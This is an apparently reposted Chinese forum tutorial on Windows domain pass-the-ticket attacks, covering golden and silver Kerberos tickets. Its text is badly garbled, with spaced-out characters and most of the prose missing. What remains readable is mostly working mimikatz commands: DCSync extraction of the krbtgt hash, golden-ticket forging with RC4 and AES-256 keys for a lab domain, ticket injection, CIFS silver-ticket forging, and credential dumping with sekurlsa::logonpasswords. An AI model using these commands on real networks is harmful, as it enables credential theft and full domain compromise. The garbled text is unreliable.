[27028] 2020-06-29_内网渗透(四)票据传递攻击

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-19
2020-06-29_内网渗透(四)票据传递攻击   |   M s 0 8 0 6 7   2 0 2 0 - 0 6 - 2 9   ( P a s s   t h e   T i c k e t , P t T ) P t T K e r b e r o s k r b t g t N T L M   A E S - 2 5 6 N T L M   A E S - 2 5 6 K e r b e r o s K e r b e r o s A   k r b t g t     s i d   A 访 ( G o l d e n   T i c k e t ) K A S T G T T G T T G S S T S T 访 S T k r b t g t H a s h k r b t g t H a s h S T 使 S T 使 k r b t g t h a s h G o l d e n   T i c k e t ( P a s s   t h e   T i c k e t , P t T )   n e t     u s e r     k r b t g t   ( ) S I D ( S I D ) k r b t g t A E S - 2 5 6   .   线
k r b t g t S I D S I D   5 0 2 S I D S - 1 - 5 - 2 1 - 2 1 8 9 3 1 1 1 5 4 - 2 7 6 6 8 3 7 9 5 6 - 1 9 8 2 4 4 5 4 7 7 A   a d m i n i s t r a t o r   m i m i k a t z m i m i k a t z   m i m i k a t z l s a d u m p : : d c s y n c   / d o m a i n : x i e . c o m   / u s e r : k r b t g t p r i v i l e g e : : d e b u g     # k e r b e r o s : : g o l d e n   / u s e r : a d m i n i s t r a t o r   / d o m a i n : x i e . c o m   / s i d : S - 1 - 5 - 2 1 - 2 1 8 9 3 1 1 1 5 4 - 2 7 6 6 8 3 7 9 5 6 - 1 9 8 2 4 4 5 4 7 7   / k r b t g t : 7 a a d 8 1 6 2 5 f a b 4 3 e 7 f d b 3 c d 9 f 3 9 9 c 0 6 0 c   / p t t     # #   k e r b e r o s : : g o l d e n   / u s e r : ( )   / d o m a i n :   / s i d : s i d   / k r b t g t : k r b t g t   / p t t 使 k r b t g t A E S - 2 5 6 p r i v i l e g e : : d e b u g     # k e r b e r o s : : g o l d e n   / u s e r : a d m i n i s t r a t o r   / d o m a i n : x i e . c o m   / s i d : S - 1 - 5 - 2 1 - 2 1 8 9 3 1 1 1 5 4 - 2 7 6 6 8 3 7 9 5 6 - 1 9 8 2 4 4 5 4 7 7   / a e s 2 5 6 : 9 3 c 3 3 5 c c e 0 3 8 5 8 c 9 1 7 f a 2 e a 9 8 c a 7 9 f 0 b 7 9 1 c 9 3 c 3 3 a b 1 7 9 3 6 7 8 4 5 4 8 1 1 4 6 4 8 c d a 7     / p t t # p r i v i l e g e : : d e b u g               # k e r b e r o s : : g o l d e n   / u s e r : a d m i n i s t r a t o r   / d o m a i n : x i e . c o m   / s i d : S - 1 - 5 - 2 1 - 2 1 8 9 3 1 1 1 5 4 - 2 7 6 6 8 3 7 9 5 6 - 1 9 8 2 4 4 5 4 7 7   / k r b t g t : 7 a a d 8 1 6 2 5 f a b 4 3 e 7 f d b 3 c d 9 f 3 9 9 c 0 6 0 c           # t i c k e t . k i r b i k e r b e r o s : p t t   t i c k e t . k i r b i     # # 使 k r b t g t A E S - 2 5 6 p r i v i l e g e : : d e b u g               # k e r b e r o s : : g o l d e n   / u s e r : a d m i n i s t r a t o r   / d o m a i n : x i e . c o m   / s i d : S - 1 - 5 - 2 1 - 2 1 8 9 3 1 1 1 5 4 - 2 7 6 6 8 3 7 9 5 6 - 1 9 8 2 4 4 5 4 7 7   / a e s 2 5 6 : 9 3 c 3 3 5 c c e 0 3 8 5 8 c 9 1 7 f a 2 e a 9 8 c a 7 9 f 0 b 7 9 1 c 9 3 c 3 3 a b 1 7 9 3 6 7 8 4 5 4 8 1 1 4 6 4 8 c d a 7         # t i c k e t . k i r b i k e r b e r o s : p t t   t i c k e t . k i r b i     #
C M D m i m i k a t z ( S i l v e r   T i c k e t ) S i l v e r   T i c k e t G o l d e n   T i c k e t T G S 访 T G T 使 K D C 使 k r b t g t T G T K D C 访 T G S L D A P M S S Q L W i n R M D N S C I F S ( ) # k e r b e r o s : : l i s t k e r b e r o s : : t g t n e t   u s e   k :   W I N 2 0 0 8 . x i e . c o m c $       # W I N 2 0 0 8 C K   .   i p k e r b e r o s : : p u r g e             # k e r b e r o s : : l i s t               #
S I D ( S I D ) F Q D N N T L M 使 使 C I F S C I F S W i n d o w s 1 使 m i m i k a t z N T L M 2 ( 3 )   ( 4 )   访 C 访 G o l d e n   T i c k e t T G T K e r b e r o s S i l v e r   T i c k e t T G S 访 G o l d e n   T i c k e t k r b t g t H a s h S i l v e r   T i c k e t   H a s h G o l d e n   T i c k e t 访 S i l v e r   T i c k e t k r b t g t   p r i v i l e g e : : D e b u g s e k u r l s a : : l o g o n p a s s w o r d s k e r b e r o s : : g o l d e n   / d o m a i n : x i e . c o m   / s i d : S - 1 - 5 - 2 1 - 2 1 8 9 3 1 1 1 5 4 - 2 7 6 6 8 3 7 9 5 6 - 1 9 8 2 4 4 5 4 7 7   / t a r g e t : W I N 2 0 0 8 . x i e . c o m   / s e r v i c e : c i f s   / r c 4 : 2 9 0 c 6 9 9 7 9 8 b 4 7 b 8 0 9 5 0 0 b 3 b b d 4 e d 3 e 2 f   / u s e r : a d m i n i s t r a t o r   / p t t k l i s t
    2 8 0 0 0 +
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则